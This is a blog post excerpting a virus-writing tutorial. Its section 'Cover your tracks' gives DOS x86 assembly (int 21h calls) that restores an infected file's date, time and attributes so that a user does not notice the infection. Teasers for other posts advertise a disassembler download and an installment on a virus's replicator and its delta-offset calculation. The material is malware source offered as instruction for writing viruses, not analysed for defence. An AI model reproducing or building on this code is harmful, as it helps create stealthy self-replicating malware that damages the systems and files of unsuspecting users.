Cover your tracks

This step, though simple to do, is too easily neglected. It is extremely important, as a wary user will be alerted to the presence of a virus by any unnecessary updates to a file. In its simplest form, it involves the restoration of file attributes, time and date. This is done with the following:

mov ax, 5701h ; Set file time/date

mov dx, word ptr [bp+f_date] ; DX = date

mov cx, word ptr [bp+f_time] ; CX = time

int 21h

mov ah, 3eh ; Handle close file

int 21h

mov ax, 4301h ; Set attributes

lea dx, [bp+offset DTA + 1Eh] ; Filename still in DTA

xor ch, ch

mov cl, byte ptr [bp+f_attrib] ; Attribute in CX

int 21h

Remember also to restore the directory back to the original one if it changed during the run of the virus.

Comments

Post a Comment

Popular posts from this blog

Free Disassembler For You!!

As for the last post, I've already giving you the free assembler for your "project", and now I'll give you free disassembler for you to have an "experiment", note that I said EXPERIMENT(LOL), on assembly language or disassemble a complete project. DOWNLOAD
Read more

Installment II: The Replicator

In the last installment of my Virus Writing Guide, I explained the various parts of a virus and went into a brief discussion about each. In this issue, I shall devote all my attention towards the replicator portion of the virus. I promised code and code I shall present. However, I shall digress for a moment because it has come to my attention that some mutant copies of the first installment were inadvertently released. These copies did not contain a vital section concerning the calculation of offsets. You never know where your variables and code are going to wind up in memory. If you think a bit, this should be pretty obvious. Since you are attaching the virus to the end of a program, the location in memory is going to be changed, i.e. it will be larger by the size of the infected program. So, to compensate, we must take the change in offset from the original virus, or the delta offset, and add that to all references to variable...
Read more